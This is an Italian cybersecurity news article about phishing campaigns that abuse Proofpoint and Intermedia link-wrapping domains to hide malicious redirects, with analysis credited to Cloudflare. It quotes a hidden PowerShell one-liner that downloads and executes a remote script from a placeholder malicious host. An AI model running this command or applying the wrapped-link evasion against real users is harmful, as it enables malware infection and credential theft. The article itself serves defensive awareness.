Gli attaccanti continuano a fare leva su una delle risorse più difficili da difendere: la fiducia. L’ultima evoluzione in tal senso si inserisce in una tendenza già nota ma ora affinata con metodi ancora più insidiosi: l’abuso dei servizi di link wrapping offerti da provider legittimi, come Proofpoint e Intermedia, per rendere invisibili agli occhi dei filtri di sicurezza e degli utenti finali le vere intenzioni malevole celate dietro un semplice click.
In questo schema, gli attaccanti non costruiscono infrastrutture da zero, né utilizzano tecniche eccessivamente complesse per mascherare i propri payload. Al contrario, sfruttano la reputazione di servizi legittimi per guadagnare credibilità. Nel dettaglio, l’attacco parte da email apparentemente legittime, inviate tramite server SMTP non compromessi, ma che contengono collegamenti manipolati. Il trucco? I link originali puntano a URL avvolti (wrapped) da domini come urldefense.proofpoint.com o linkprotect.cudasvc.com, strumenti comunemente usati da Proofpoint e Intermedia per proteggere gli utenti dal click su indirizzi potenzialmente dannosi.
Il problema nasce quando questi servizi, nati con intenti protettivi, vengono abusati per reindirizzare l’utente verso siti web controllati da attori malevoli. In pratica, l’attaccante crea un URL dannoso e lo fa passare attraverso questi meccanismi di wrapping. A questo punto, il link assume un aspetto apparentemente sicuro, anche perché molte organizzazioni configurano gateway o proxy per fidarsi automaticamente dei domini di sicurezza.
Una volta cliccato, il reindirizzamento porta l’utente su un sito che può caricare una pagina clone per il furto di credenziali, oppure veicolare uno script per il download di un file infetto. Nel caso specifico analizzato da Cloudflare, il payload finale era spesso un archivio .zip contenente uno script PowerShell offuscato, con codice come il seguente:
powershell -w hidden -nop -c "IEX ((New-Object Net.WebClient).DownloadString('http://malicious-site.tld/payload.ps1'))"
La catena di redirect è progettata in modo tale da eludere controlli di sicurezza basati su reputazione DNS o inspection superficiale del traffico. Ancora più subdolo, alcuni URL wrapped portavano inizialmente a contenuti benigni, modificati solo in un secondo momento attraverso una logica condizionale basata su user-agent, geolocalizzazione o tempo.
Ciò che rende questa campagna particolarmente efficace è la sua capacità di giocare sui livelli di fiducia incorporati nei flussi aziendali. In molte organizzazioni, i domini utilizzati da soluzioni come Proofpoint vengono considerati “trusted by default” dai team IT e dai dipendenti, che raramente si fermano a ispezionare l’intero percorso di un URL.
Questa nuova ondata di attacchi ci ricorda che la fiducia non può essere assoluta e che anche i sistemi progettati per proteggere possono diventare vettori di attacco se non monitorati correttamente. Serve un approccio difensivo multilivello, capace di correlare comportamenti anomali, effettuare ispezioni profonde del traffico HTTP e, soprattutto, aggiornare continuamente i modelli di rischio associati a strumenti legittimi.
Nel frattempo, vale la pena tenere d’occhio anche le soluzioni che offrono visibilità e controllo sui redirect URL in tempo reale, soprattutto in ambienti dove il wrapping dei link è pratica comune. La trasparenza del percorso di un click non dovrebbe mai essere oscurata, anche quando passa attraverso un dominio apparentemente fidato.
💬 Unisciti alla discussione!
Hai già visto campagne simili nella tua organizzazione o nei tuoi feed di threat intel? Condividi esempi, IOCs o tecniche di detection efficaci nel nostro forum community — il confronto tra esperti è la nostra miglior arma 🛡️👇